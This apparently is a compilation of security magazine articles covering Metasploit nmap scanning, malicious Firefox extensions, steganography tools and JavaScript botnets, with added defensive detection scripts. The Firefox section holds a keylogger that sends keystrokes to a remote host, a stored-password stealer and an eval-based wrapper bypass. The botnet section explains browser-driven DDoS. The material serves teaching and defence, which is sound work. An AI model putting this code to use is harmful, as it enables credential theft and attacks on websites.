Now with the scan complete and the host listed in db_hosts you can run the autopwn tool or find an exploit that will work against the box. More on this in another article next month. Now let's take a look at using nmap within the Metasploit framework. Use the 'db_nmap' command to run nmap scans against targets and have the scan results stored in the database. When running on Back|Track I can issue many different nmap commands, such as:
db_nmap -sS -sV -T 3 -P0 -O -D RND --packet-trace
These options mean: -sS TCP SYN stealth scan, -sV version scan, -T 3 normal timing, -O detect the operating system, -D RND use a decoy with a random, non-reserved IP address, and finally --packet-trace traces all packets and data sent and received. I like to use the packet-trace feature on large scans because if it fails you can see it. Now this is a great feature to use while in the msfconsole, but I can't do this when using Ubuntu and connected to the postgres database as the postgres user. Why? Because I get an error saying that only the root user has the ability to use this nmap option (see Figure #7). I can use 'db_nmap -v -sV 192.168.15.0/24 --packet-trace' and the scan runs and produces output. I view the results with the following commands (Figure 8):
msf > db_hosts
msf > db_services -c port,state
Figure 7: nmap error with postgres
Now if I want to issue complex nmap scans I can exit out of the msf prompt, exit out of postgres, stop the database, log in with sudo and use the sqlite3 database. The same command that the OS didn't allow me to use can now be used with no problem (Figure #9).
Figure 8: db_nmap using postgres database
Figure 9: db_nmap using sqlite3
msf > db_nmap -sS -sV -T 4 -P0 -O 192.168.15.0/24 -D RND --packet-trace
Look at the difference in results we now have after viewing information with the db_hosts and db_services -c port,state commands. Compare the difference between Figure #10 and Figure #8.
Figure 10: nmap results showing sqlite3
Conclusion
This information can be useful in checking the integrity and strength of your network if you are the Network Security Engineer for your workplace and have permission to do so. Doing this to networks that you have no authorization to be on is against the law in many if not all countries.
For more information and some video tutorials please visit my website at http://pbnetworks.net
On the 'Net
Link to postgres setup: http://dev.metasploit.com/redmine/projects/framework/wiki/Postgres_setup
Link to video tutorials: http://pbnetworks.net/?cmd=bbs
dave@pbnetworks.net
David J. Dodd
David J. Dodd is currently in the United States and holds a current 'Secret' DoD clearance. He is a former U.S. Marine with an avionics background in Electronic Countermeasures Systems. David has given talks at the San Diego Regional Security Conference. He works for pbnetworks Inc. (http://pbnetworks.net), a small service-disabled-veteran-owned business located in San Diego, CA.
CHMag Collector's Edition Vol II
This paper aims to detail some of the techniques and methods that exist to subvert a fully patched and functioning Firefox browser. It aims to provide insight to developers and end users into some methodologies which could be used by malicious users. We will cover some of the basic important components that make up the Mozilla platform and various attacks that can be targeted against it. Firefox is a trusted browsing platform used by millions across the globe, by experts and novices alike. One of the biggest advantages, and a reason for the massive success of Mozilla, is an extensible plug-in model which allows developers to add features to the Mozilla Firefox environment beyond what was conceived by the original writers. Our topic of discussion is focused on these extension modules and how a malicious developer can use some of these powerful features to subvert Firefox and the underlying systems. The code of an extension runs with the same privilege that the browser enjoys.
Let’s begin with a very brief look at some of the important components that make up a Firefox extension. * This is for Firefox 3.6 and has not yet been tested with Firefox 4.
Chrome
Chrome is used to indicate a special trust zone within Firefox; Firefox extensions that run in this zone enjoy a great deal of trust from the browser. Chrome resources are identified by a special URL scheme, “chrome://”. Example: chrome://messenger/content/messenger.xul
XUL
XUL (XML User Interface Language) is Mozilla's XML-based language that lets you build feature-rich cross-platform applications that can run connected to or disconnected from the Internet. XUL overlays are a way of extending the user interface and behavior; examples are a new menu item or a button on the status bar.
XBL
XBL (XML Binding Language) allows the definition of new XML nodes/elements, or custom tags. Custom tags can inherit processing logic. The connection between the new tag and the processing logic is called a binding. The object logic can be written to take advantage of any of the services available to the platform, including all the XPCOM objects and other custom tags that possess their own bindings. XML content and XPCOM can be tied together via an XBL binding. The “tabbed navigation” in Firefox is an example of XBL.
XPCOM
XPCOM is the lowest layer of the Mozilla platform architecture. XPCOM provides functionality to the browser and its extensions. XPCOM interfaces are used by the browser and extensions to provide multiple functionalities to the user. XPCOM components can be built in many programming languages, among them C++, Python, and Java. XPConnect is the JavaScript interface to XPCOM objects. Extensions can create new components after installation.
Each one of these components can be used by a malicious user for his own gains.
The Full Mozilla Components Map
Extensions Installation
A Firefox extension, commonly known by its “XPI” file extension, is nothing but a zipped archive. This means a user can use any unzip tool, like “winzip”, to examine the contents of an extension.
Extensions can be downloaded from “https://addons.mozilla.org/en-US/firefox/”. A peer review of extensions is performed before Mozilla places an extension on its site. But the point of concern is that security testing is not of utmost importance for the testers. The second issue that has surfaced is the possibility of extensions which are hosted at Mozilla but without code review. These are mostly experimental in nature. The sheer number of extensions is overwhelming. Today the number of extensions has crossed more than 2 billion and is growing.
An XPI file can be hosted on any website and can be downloaded and installed on the target system. Any malicious user with some social engineering experience can easily convince a user to install his XPI. The other aspect I would like to bring to notice is the fact that many organizations offer extensions, like a DLP solutions company offering an extension to scan outgoing data via Firefox. The question then remains as to who performs analysis of these extensions.
The third method of installation is one Mozilla provides itself: a file whose name is the id of the extension, and whose contents store the location where the extension files are kept, is placed in the Mozilla extensions folder, which is typically in the Program Files folder or in the Mozilla profile directory. When Mozilla restarts it automatically installs the extension, no questions asked.
A startling find I made when working with Mozilla extensions is that the extension's executable scripts can be stored on a remote machine in a share.
By default Mozilla does not allow files to be loaded from the network, but if it is a mapped drive then Mozilla treats it like a local disk and goes ahead and installs the extension. This functionality can be abused. The worst-case scenario I can imagine is an attack by a malicious USB device injecting a simple text file into a victim machine, with the text file pointing to malicious code on a remote zip drive. The same activity could be performed by a malicious Active Directory administrator owning browser rights across the enterprise.
Though a code review is performed by Mozilla before add-ons get published on their site, some of the concerns that exist are:
- The add-on is not signed as of today.
- The sheer number of add-ons is overwhelming.
- The ease of making an add-on could add to the problem.
- The availability of experimental add-ons and extensions that have not gone through the review process.
- Future upgrades to an add-on could add malicious content.
Extensions are everywhere
Attacking Firefox
In the second part of this paper we will focus on attacking Firefox. In this section we will discuss how easy it is to build malicious extensions, and then go on to discuss cross context switching (XCS).
Malicious Extensions
To keep this paper short I will discuss:
- How to build a key logger with XMLHttpRequest and an event listener
- How to build an extension that writes a malicious site to the “No-Script” white list
- How to build an extension that steals stored passwords
Key Logger
We can create a simple key logger just by using an event listener which records all keystrokes and then uses an XMLHttpRequest to a remote site. The point to note here is that extensions don’t follow the same-origin policy, thus an extension that records a password from your banking site can send it to a malicious site. Code:-
document.addEventListener("keypress", onkey, false);
var keys = '';
function onkey(e) {
  // Buffer keystrokes, then flush the buffer to the remote site once it is long enough.
  keys += String.fromCharCode(e.charCode);
  if (keys.length > 20) {
    http = new XMLHttpRequest();
    url = "http://***********.com/prasannak/ler****.php?keylog=" + keys + "\n";
    http.open("GET", url, false);
    http.send(null);
    keys = '';
  }
}
No-Script Bypass
We will use XPCOM classes and components to add a malicious site to the No-Script white list, which will effectively render No-Script's protection useless.
Password Stealer
We will use XPCOM classes and components to build a Firefox stored-password stealer. Code:-
let HelloWorld = {
  onCommand: function(event) {
    // nsILoginManager hands every stored credential to chrome-privileged code.
    var l2m = Components.classes["@mozilla.org/login-manager;1"]
                .getService(Components.interfaces.nsILoginManager);
    var alltheinfo = l2m.getAllLogins({});
    for (var i = 0; i < alltheinfo.length; i = i + 1) {
      alert(alltheinfo[i].password);
    }
  }
};
These were some sample malicious scripts that were written using basic and legitimate functions approved by Mozilla to produce some very malicious extensions. Malicious extensions are limited only by the imagination of their creator.
Cross Context Switching (XCS)
The XCS attack was first found by “pdp”, against an extension called Sage. XCS involves making malicious code move from one realm to another, like code in a website being executed by a resident extension. A major harm caused by such an attack is that a user could be compromised just by visiting a web location.
Attacking DOM & Event Handlers
Event handlers implement the properties, attributes and behavior of an element. When a DOM element is dragged and dropped it takes its attributes, properties and behavior with it. This could be maliciously used if extension code trusted the code dropped by a malicious DOM element.
createEvent() could be used to send custom events, which could also reach the extension itself. In this example we will create an extension which listens for custom events and performs a certain activity, like loading a dynamic XUL.
This could be exploited by a malicious user by making the victim go to a page controlled by him, which contains code that creates a custom event sending the location of the malicious XUL he hosts.
The extension, on receiving the event, loads the malicious XUL from an arbitrary location, and as the XUL file now runs as part of chrome it is free to do any malicious activity like the ones discussed in the previous section, “Malicious Extensions”.
As of Firefox version 3.5 the “loadOverlay” function does not take “http” based XUL requests but does allow XUL from “chrome://”. Though this fixes the problem of a malicious user loading malicious content from the internet, the threat of loading malicious XUL from a mapped drive still exists.
Code:-
Extension XUL Code
Malicious Web Location Code
This Test Page
Bypassing Wrappers
Multiple wrappers exist within the Mozilla framework that act as firewalls segregating code from different zones. A developer, for ease of use, could bypass these firewalls, thus exposing the Firefox eco-system to malicious XCS attacks.
We will create a Firefox extension that bypasses such a wrapper, using “wrappedJSObject” to access variables in the document zone and use this content in the privileged chrome zone. The extension developer also uses another potentially vulnerable function, “eval()”: he grabs content from the document and runs it through eval() in the chrome zone, which allows a malicious user to inject JavaScript code that will be executed by the eval function. Code:-
Extension Code
function Test_Function() {
  // my_message comes from the content document; with the wrapper in place
  // content-defined values are not visible to chrome code.
  var test = my_message;
  if (test == null) {
    alert("Wrapper Exists");
  } else {
    alert(test);
    // The flaw under discussion: reach through the wrapper and eval() page-controlled text.
    var trim = window.content.wrappedJSObject.my_message1;
    eval(trim);
  }
}
Malicious Website Code
This Test Page
Protection for end users
Some points that end users can keep in mind for keeping their Firefox environment safe are:-
- Look for suspicious single file(s) in the extensions folder.
- XPI files are archives: they can be unzipped and checked for any packaged executables.
- Check install.rdf for common pitfalls; mainly, verify that chrome.manifest does not point to other extension folders, as it can overwrite functionality.
Measures that developers can take:-
- That’s a whole paper by itself.
- Don’t bypass wrappers.
- Don’t trust content from the untrusted context.
- Don’t use eval().
Follow this link: https://developer.mozilla.org/en/Security_best_practices_in_extensions
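The end-user checklist above (packaged executables, chrome.manifest pointing outside the extension folder) and the developer rules (no wrapper bypass, no eval) can be turned into a static triage script. This is an added example, not a tool from the paper: it builds a constructed, hypothetical XPI in memory (every name in it is made up) and audits it with Python's zipfile module.

```python
import io
import re
import zipfile

# File types that have no business inside a browser extension archive.
EXECUTABLE_EXTS = (".exe", ".dll", ".scr", ".com", ".bat", ".cmd", ".vbs", ".so", ".dylib")

# Source patterns the paper singles out as dangerous or privilege-bearing.
RISKY_PATTERNS = {
    "eval": re.compile(r"\beval\s*\("),
    "wrappedJSObject": re.compile(r"\bwrappedJSObject\b"),
    "login-manager": re.compile(r"@mozilla\.org/login-manager;1"),
    "keypress-listener": re.compile(r"addEventListener\(\s*[\"']keypress[\"']"),
}

# Absolute, UNC, file: or parent-relative paths in chrome.manifest can reach
# outside this extension's folder (for example into another extension).
ESCAPES_EXTENSION = re.compile(r"^(\.\./|/|[A-Za-z]:[\\/]|\\\\|file:)|/\.\./")


def extension_id(install_rdf):
    """Pull the em:id out of install.rdf (element form or attribute form)."""
    m = (re.search(r"<em:id>\s*([^<\s]+)\s*</em:id>", install_rdf)
         or re.search(r"\bem:id=[\"']([^\"']+)[\"']", install_rdf))
    return m.group(1) if m else None


def audit_xpi(xpi_bytes):
    """Return (extension_id, findings); each finding is a (category, detail) tuple."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(xpi_bytes)) as zf:
        names = zf.namelist()

        ext_id = None
        if "install.rdf" in names:
            ext_id = extension_id(zf.read("install.rdf").decode("utf-8", "replace"))
        if ext_id is None:
            findings.append(("no-install-rdf-id", "install.rdf missing or has no em:id"))

        for name in names:
            if name.lower().endswith(EXECUTABLE_EXTS):
                findings.append(("packaged-executable", name))

        if "chrome.manifest" in names:
            manifest = zf.read("chrome.manifest").decode("utf-8", "replace")
            for lineno, line in enumerate(manifest.splitlines(), 1):
                fields = line.split()
                if not fields or fields[0].startswith("#"):
                    continue
                # Any field after the directive may be a path; chrome:// URIs are fine.
                for field in fields[1:]:
                    if not field.startswith("chrome://") and ESCAPES_EXTENSION.search(field):
                        findings.append(("manifest-path-escapes",
                                         "line %d: %s" % (lineno, line.strip())))

        for name in names:
            if name.lower().endswith((".js", ".jsm", ".xul")):
                source = zf.read(name).decode("utf-8", "replace")
                for label, pattern in RISKY_PATTERNS.items():
                    if pattern.search(source):
                        findings.append(("uses-" + label, name))
    return ext_id, findings


def build_sample_xpi():
    """Constructed sample XPI (hypothetical extension) exhibiting every problem above."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("install.rdf",
                    '<RDF xmlns:em="http://www.mozilla.org/2004/em-rdf#"><Description>'
                    "<em:id>sample@example.invalid</em:id></Description></RDF>")
        zf.writestr("chrome.manifest",
                    "content sample chrome/content/\n"
                    "overlay chrome://browser/content/browser.xul chrome://sample/content/overlay.xul\n"
                    "content other ../otherext@example.invalid/chrome/content/\n")
        zf.writestr("chrome/content/overlay.js",
                    "var msg = window.content.wrappedJSObject.my_message;\n"
                    "eval(msg);\n")
        zf.writestr("chrome/content/helper.exe", b"MZ constructed placeholder, not a real binary")
    return buf.getvalue()


if __name__ == "__main__":
    ext_id, found = audit_xpi(build_sample_xpi())
    print("extension id:", ext_id)
    for category, detail in found:
        print("  [%s] %s" % (category, detail))
```

A hit on any category is a reason to unzip and read the extension by hand, not proof of malice; legitimate extensions do use the login manager, for instance.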
Last Words
In this paper we discussed some of the components that make up Firefox extensions. This is by far not the end: new features like skins and extensions that don’t need a restart bring newer problems. I believe Firefox is a powerful system that could be used for both good and bad. It helps for users to be a bit cautious when using new extensions, and developers, when developing new extensions, should take care to avoid known pitfalls.
This paper is largely based on research performed by Roberto Suggi Liverani and Nick Freeman of Security-Assessment.com in 2009/2010. Further details regarding their research into Firefox extensions and their vulnerabilities can be found at the following locations:
Prasanna Kanagasabai
Prasanna Kanagasabai is an independent information security researcher who enjoys the nuances of information security. He is an active member of the “DeadPixel” security group, which is an association of like-minded professionals who enjoy information security and share knowledge within the group to the benefit of one and all.
Steganography is the art of hiding information in images. In Greek, steganography means “covered writing”. In steganography, confidential data is hidden in images to protect it from unauthorized users. So basically it means hiding a secret message within a cover medium in such a way that others cannot detect the presence of the hidden message. In contemporary terms, steganography has evolved into a digital strategy of hiding a file in some form of multimedia, such as an image, an audio file (like a .wav or mp3) or even a video file.
Steganography vs. Cryptography
Steganography and cryptography are two important techniques to secure data. They have gained importance post World War II. They are now widely used by law enforcement agencies, terrorists, etc.
Steganography’s goal is to hide the presence of a message.
Cryptography’s goal is to obscure a message or communication so that it cannot be understood.
Steganography differs from cryptography in the sense that cryptography focuses on keeping the contents of a message secret, whereas steganography focuses on keeping the existence of the message secret. The strength of steganography can thus be amplified by combining it with cryptography. Steganography and cryptography make a powerful combination for data security!
Methods of Steganography
Embedding messages in media, like
Plain Text
Steganography with plain text can be done in a number of ways, as mentioned below:
- Using selected characters or words from a specially-crafted cover text. (Consider this sentence: “Since Everyone Can Read, Encoding Text In Neutral Sentences Is Doubtfully Effective”. If you observe, the first letter of each word is used to convey a message: Secret Inside!!)
- Introducing white-space characters (line spaces and tabs) that a text viewer won’t display.
For demonstration purposes we will illustrate SNOW (Steganographic Nature Of Whitespace).
SNOW
Snow is a program for concealing and extracting messages in ASCII text files. It conceals messages by appending tabs and spaces (known as whitespace) to the ends of lines. Tabs and spaces are invisible in most text viewers, hence the steganographic nature of this encoding scheme.
Figure 1.1 shows all the available options in snow. They are described below:
-C = use compression during concealing, uncompress during extraction
-Q = quiet mode, used to turn off verbose messages while the program runs
-S = show approximate space available in the cover file
-p = password option, used for encryption/decryption
-l = snow will create lines shorter than this optional line-length parameter
-f = this is the secret file
-m = this is the secret message string
infile = this is the input cover file
outfile = this is the output file
For this example, we will use following file :-
insnow.txt = this is the secret file to conceal
hide.txt = this is the infile (cover file)
outsnow.txt = this is the outfile (cover file + secret file)
p@ssword = this is the password used for encryption/decryption
Note:- All the above specified examples need appropriate substitution for practical purposes.
Now to hide the file – insnow.txt within hide.txt using encryption with the output of snow, the command is as follows:
Now to extract the hidden message following command is used:
And the contents of the secret file are revealed:-
“meet me at dawn”
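Because snow's channel is nothing more than tabs and spaces appended to line ends, the defensive side is straightforward: measure trailing whitespace and strip it. This is an added example, not part of snow or of the article; the cover text and the thresholds in it are constructed assumptions for the demo.

```python
import re

# Trailing run of spaces and/or tabs at the end of a line.
TRAILING = re.compile(r"[ \t]+$")


def analyse_whitespace(text):
    """Summarise trailing whitespace in a text and flag snow-like patterns.

    Ordinary editing leaves the odd trailing space; snow leaves runs that mix
    tabs and spaces on most lines, which is what the heuristic keys on."""
    lines = text.replace("\r\n", "\n").split("\n")
    stats = {"lines": len(lines), "trailing_lines": 0, "mixed_lines": 0,
             "trailing_chars": 0, "max_run": 0}
    for line in lines:
        m = TRAILING.search(line)
        if not m:
            continue
        run = m.group(0)
        stats["trailing_lines"] += 1
        stats["trailing_chars"] += len(run)
        stats["max_run"] = max(stats["max_run"], len(run))
        if " " in run and "\t" in run:
            stats["mixed_lines"] += 1
    # Either several tab/space-mixed runs, or trailing whitespace on most lines
    # with enough characters to carry a message. Thresholds are an assumption.
    heavy = (stats["lines"] > 0
             and stats["trailing_lines"] / stats["lines"] > 0.5
             and stats["trailing_chars"] > 16)
    stats["suspicious"] = stats["mixed_lines"] >= 2 or heavy
    return stats


def strip_trailing_whitespace(text):
    """Sanitiser: removing the trailing runs destroys the covert channel, so an
    outbound gateway can normalise text instead of trying to decode it."""
    normalised = text.replace("\r\n", "\n")
    return "\n".join(TRAILING.sub("", line) for line in normalised.split("\n"))


# Constructed cover text, and the same text with tab/space runs appended to
# imitate what snow leaves behind.
CLEAN_TEXT = "meet me\nat the usual place\nregards\n"
STEGO_TEXT = "meet me \t  \t\nat the usual place\t   \t \nregards  \t\t \n"

if __name__ == "__main__":
    for label, sample in (("clean", CLEAN_TEXT), ("stego", STEGO_TEXT)):
        print(label, analyse_whitespace(sample))
```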
Image Steganography
Data can be hidden in images also. In fact images are most widely used in steganography.
Tools:
Many tools are available to do image steganography like Camouflage, JPEG-JSTEG. For demonstration we will use Camouflage.
Camouflage:
Camouflage allows you to hide files by scrambling them and then attaching them to the file of your choice. This camouflaged file then looks and behaves like a normal file, and can be stored or emailed without attracting attention. Camouflage is easy to install, user-friendly and a very versatile steganography tool that is free of cost and readily available for download.
For example following files will be used:-
Sunflower.jpg = cover medium
Secret.jpg = file to be hidden
Kiss = passphrase
Camouflaging Files:
You can camouflage a file or several files at a time by right-clicking them and choosing “Camouflage” from the menu. Following window will appear.
Now, in the first window, you can view/edit the files by double-clicking them or by right-clicking them and choosing ‘Open’. Selecting ‘Properties’ will give information about the file.
Anyway, click next.
Here, in the second window, it will ask for the cover medium (file). Select a file with which you want to cover your secret file. This file can be of any type, but in this example we are using a .JPG file.
In the next window, give the location and filename for the camouflaged file. Check ‘Read-only’ to create camouflaged file with its ‘Read-only’ attribute. This is recommended because it makes the file safer, and prevents other applications from modifying it and destroying the camouflaged section.
In the final window you can type a password. We will use “kiss” as the password for demonstration purposes. If you do not wish to add a password then just click ‘Finish’. This will create the camouflaged file and then exit.
Uncamouflaging Files:
To extract the files hidden within a camouflaged file, right-click the camouflaged file and choose ‘Uncamouflage’ from the menu.
A password prompt appears. Enter the password, if any. Once you have entered the correct password (if applicable), click ‘Next’.
This window displays a list of the files hidden within the camouflaged file. The first file in the list is the file originally used as camouflage (cover medium). To extract the files just click ‘Next’.
Here give the location where you want the file to be extracted. Now you can view your secret file!!!
Audio Steganography
In audio steganography, secret messages are embedded in digital sound. The secret message is embedded by slightly altering the binary sequence of a sound file. Existing audio steganography software can embed messages in WAV, AU, and even MP3 sound files.
Embedding secret messages in digital sound is usually a more difficult process than embedding messages in other media, such as digital images.
S-Tools:
For example following files will be used:-
Cover.wav = this is the cover medium file
Secret.wav = this is the hidden data file
Out.wav = output file (cover_medium + hidden_file)
p@ssw0rd = this is the passphrase
Open S-Tools (S-Tools.exe). Drag the cover medium, in this case cover.wav, into the S-Tools window.
Now, to hide the secret file, drag secret.wav into the S-Tools window and drop it onto the cover medium. Immediately you will be prompted for a passphrase. The passphrase is used in generating the pseudo-random numbers which are used to insert the bits into the cover file. IDEA, DES, Triple DES, and MDC are the encryption algorithms provided by S-Tools.
After choosing an appropriate passphrase and encryption algorithm, right-click on the secret file and save it.
The passphrase and encryption algorithm used must be remembered in order to extract the secret file.
Now, to extract the hidden message, open the out.wav in S-Tools.
Steganography, the easy way… No steganography software required!!! Yes, you read it right: no steganography software.
So here is a quick how-to on doing image steganography with common tools, without any specialized software.
1. Compress the file you want to secure (I tried both rar and zip), say secure.zip
2. Take the image file which you want to use, say image.jpg
3. Run the following command:
copy /b image.jpg + secure.zip hidden.jpg
4. Double click hidden.jpg and you'll see the original image
5. Open the file in an archiving utility (tried winzip and winrar)
6. It will open the content of the original secure.zip
Abhijeet R Patil
abhijeet@chmag.in
Analysis
copy command copies the content of both the files into a third file.
The third file starts with the header of an image, and even its extension is that of an image, so the OS (tried KDE and GNOME in the case of Linux) interprets it as an image and displays it, without any distortion or noise in the image.
The /b option indicates a binary copy and takes care of any possible goof-up.
PoC
Download the image from http://bit.ly/stegano-demo which looks like one below & try opening it in any archiving software.
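The flip side of the copy /b trick is that the image viewer stops reading at the JPEG end-of-image marker, so everything glued on after it is still sitting in the file. This added example (not from the article) finds an archive appended after the EOI marker, lists the zip's contents, and truncates the file at the end of the image, which is the mitigation a mail or upload gateway would apply. The JPEG and zip are constructed stand-ins for image.jpg and secure.zip.

```python
import io
import zipfile

JPEG_SOI = b"\xff\xd8"
JPEG_EOI = b"\xff\xd9"
# Signatures of the archive formats the article tried (zip, rar).
ARCHIVE_MAGIC = {
    b"PK\x03\x04": "zip",
    b"Rar!\x1a\x07\x00": "rar4",
    b"Rar!\x1a\x07\x01\x00": "rar5",
}


def find_appended_archive(data):
    """Return (kind, offset) if an archive starts right after a JPEG end-of-image
    marker, else None. EOI markers of embedded thumbnails are skipped naturally:
    what follows them is more JPEG data, not an archive signature."""
    if not data.startswith(JPEG_SOI):
        return None
    pos = 0
    while True:
        eoi = data.find(JPEG_EOI, pos)
        if eoi == -1:
            return None
        tail = data[eoi + 2:]
        for magic, kind in ARCHIVE_MAGIC.items():
            if tail.startswith(magic):
                return kind, eoi + 2
        pos = eoi + 2


def list_hidden_zip(data):
    """Names inside an appended zip, or [] when there is none."""
    hit = find_appended_archive(data)
    if hit is None or hit[0] != "zip":
        return []
    with zipfile.ZipFile(io.BytesIO(data[hit[1]:])) as zf:
        return zf.namelist()


def strip_appended_data(data):
    """Mitigation for a gateway: cut the file at the end of the image so anything
    glued on after it is dropped. The picture itself is untouched."""
    hit = find_appended_archive(data)
    return data if hit is None else data[:hit[1]]


def build_sample_jpeg():
    """Constructed stand-in for image.jpg: SOI, a minimal APP0/JFIF segment, EOI.
    Not a decodable picture, but the markers sit where a real file has them."""
    app0 = (b"\xff\xe0" + b"\x00\x10" + b"JFIF\x00" + b"\x01\x01" + b"\x00"
            + b"\x00\x01\x00\x01" + b"\x00\x00")
    return JPEG_SOI + app0 + JPEG_EOI


def build_sample_zip(files):
    """Constructed stand-in for secure.zip from a {name: bytes} mapping."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()


if __name__ == "__main__":
    hidden = build_sample_jpeg() + build_sample_zip({"secret.txt": b"meet me at dawn"})
    print(find_appended_archive(hidden), list_hidden_zip(hidden))
```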
JavaScript Botnets
Anybody who has had even a slight brush with the security industry will have heard of botnets at least once. Botnets are groups of computers compromised and controlled by an attacker; these computers, or zombies, perform any actions the attacker commands them to. Botnets are usually created by compromising the victims' systems with remote code execution exploits and then installing backdoors on them. The attackers must keep working on exploits for 0-days or newly discovered vulnerabilities to be able to infect more victims. Even then they are usually restricted to only one platform unless they have exploits and backdoors for the different platforms out there. There is another type of remote code execution that is far easier to perform: JavaScript in web pages. Executing JavaScript on someone's system does not require any 0-days or exploits but simply requires the person to visit a website. Moreover, the same piece of JavaScript works across all OSs and platforms (desktops, tablets, mobiles etc). Every time a user clicks on a link he is giving a remote website an opportunity to execute code (JavaScript) on his machine. The window of this opportunity is widened by the concept of tabbed browsing. Most users have multiple open tabs, and most tabs remain open throughout the browsing session, which could stretch for hours. This enables an external entity to utilize the user’s processing power and bandwidth for his malicious needs. Spammers, especially on sites like Twitter, have been able to get thousands of users to click on their links in very short durations. But JavaScript is believed to be handicapped by performance constraints and the restrictions enforced by the browser’s sandbox. This however is a misconception, as JavaScript engines have become extremely fast over recent years. Moreover, HTML5 introduces WebWorkers, which is a threading model for JavaScript. This lets any website start a background JavaScript thread unknown to the user and execute code without slowing down the browser or making it unresponsive.
Creating a JavaScript Botnet:
A JavaScript botnet would include thousands of systems that have the attacker-controlled page open in their browsers for an extended duration, allowing continued execution of the attacker’s JavaScript. There are two phases in building such a botnet:
1) Reaching out to victims
2) Extending execution lifetime
1) Reaching out to victims: This involves getting the victim to visit an attacker-controlled website. This can be done in a number of different ways:
1) Email spam
2) Trending topics on Twitter
3) Persistent XSS on popular websites, forums etc.
4) Search engine poisoning
5) Compromised websites
6) Abusing URL shorteners
These are methods used by current JavaScript malware authors to attract victims to their websites, and they can draw thousands of victims. While traditional malware-spreading websites can be quickly identified by automated crawlers looking for signatures of browser exploits, JavaScript botnet payloads are less likely to be identified, since the payload is regular JavaScript working within the constraints of the sandbox and does not perform any exploitation against the browser.
2) Extending execution lifetime: Once a victim visits the attacker-controlled page it is essential to keep this page open in the victim’s browser for as long as possible. This can be done by using a combination of Clickjacking and Tabnabbing. When the page is loaded, it would contain an invisible link with the target attribute set to ‘_blank’. This link is always placed under the mouse pointer using the ‘document.onmousemove’ event handler. This way, when the victim clicks anywhere on the page a new tab opens and grabs the victim’s attention. With multiple tabs open the likelihood of the victim coming back to the main tab and closing it is reduced. To add to this effect, Tabnabbing can be used to refresh the page after the user leaves it, updating the favicon and appearance to look similar to popular websites like YouTube, Google or Facebook so that the page blends in with the other tabs the victim would usually have open. There is a working demo [http://www.andlabs.org/hacks/xtend_life.html] for this available on the Attack and Defense Labs website.
JavaScript botnet activities:
JavaScript botnets can be used to perform the same activities that are performed by traditional botnets. This article will discuss three such activities:
1) Application-level DDoS attacks
2) Email spam
3) Distributed password cracking
1) Application-level DDoS attacks
DDoS attacks have been all over the news recently as activists on either side of the Wikileaks debate took out each other's websites. Firms like Mastercard and Visa have suffered significant losses due to this. An application-level DDoS attack is an effective type of DDoS attack that has affected even sites like Twitter. Usually these attacks involve a large number of HTTP requests to specific sections of the website that are resource intensive for the server to process. Background JavaScript threads started using WebWorkers can send cross-domain XMLHttpRequests even though the remote website does not support them: the Cross Origin Request security restriction is only on reading the response. A website that does not support cross-origin requests will still process these requests, thereby creating load on the server. A simple request like http://www.target.site/search_product.php?product_id=% when sent in large numbers can create severe performance issues on the server. A browser can send a surprisingly large number of GET requests to a remote website using COR from WebWorkers. During tests it was found that around 10,000 requests/minute can be sent from a single browser. With even a very small botnet of just 600 zombies we would be sending around 100,000 requests/sec; depending on the nature of the page being requested this could be enough to bring a website down. After I wrote about DDoS attacks with COR a very smart person [http://shellex.info] showed me that similar numbers could also be achieved by using the img tag to request remote resources. Ben Schmidt has gone one step further by creating a malicious URL shortening service called d0z.me. d0z.me seems to work like any other URL shortening service but it actually shows the destination page in an iframe while performing DoS attacks on a target website from the victim's browser. It does this so well that it is extremely unlikely that the user will even sense that he is part of a DDoS attack.
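From the target's side, a browser-driven flood of the kind described above has a recognisable shape in the access log: many unrelated client addresses hitting the same expensive endpoint within the same minute, all carrying the same third-party Referer (the page hosting the script). The detector below is an added example, not from the article; the combined-format log lines, host names, addresses and thresholds are constructed for the demo, and the site's own host name is an assumed setting.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache/nginx combined log format; the Referer field is what ties the clients together.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')
OWN_HOST = "www.target.example"  # assumed: the host whose logs are being analysed


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    ts = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["minute"] = ts.strftime("%Y-%m-%d %H:%M")
    rec["path"] = rec["path"].split("?", 1)[0]  # collapse query-string variations
    return rec


def detect_browser_flood(lines, min_requests=50, min_clients=5):
    """Flag (minute, path, referer) buckets where many distinct clients, all sent
    by the same external page, hit one endpoint at a high rate."""
    buckets = defaultdict(lambda: {"count": 0, "ips": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        bucket = buckets[(rec["minute"], rec["path"], rec["referer"])]
        bucket["count"] += 1
        bucket["ips"].add(rec["ip"])
    alerts = []
    for (minute, path, referer), bucket in buckets.items():
        external = referer not in ("", "-") and OWN_HOST not in referer
        if external and bucket["count"] >= min_requests and len(bucket["ips"]) >= min_clients:
            alerts.append({"minute": minute, "path": path, "referer": referer,
                           "requests": bucket["count"], "clients": len(bucket["ips"])})
    return sorted(alerts, key=lambda a: -a["requests"])


def build_sample_log():
    """Constructed log: 8 clients sending 10 requests each to the search page within
    one minute, all referred by the same lure page, plus a little normal traffic."""
    fmt = '{ip} - - [{ts}] "GET {path} HTTP/1.1" 200 512 "{ref}" "Mozilla/5.0"'
    lines = []
    for i in range(8):
        for n in range(10):
            lines.append(fmt.format(ip="198.51.100.%d" % (i + 1),
                                    ts="10/Mar/2011:12:00:%02d +0000" % n,
                                    path="/search_product.php?product_id=%d" % n,
                                    ref="http://lure.example/page.html"))
    for i in range(3):
        lines.append(fmt.format(ip="203.0.113.%d" % (i + 1),
                                ts="10/Mar/2011:12:00:30 +0000",
                                path="/search_product.php?product_id=42",
                                ref="http://www.target.example/index.html"))
    return lines


if __name__ == "__main__":
    for alert in detect_browser_flood(build_sample_log()):
        print(alert)
```

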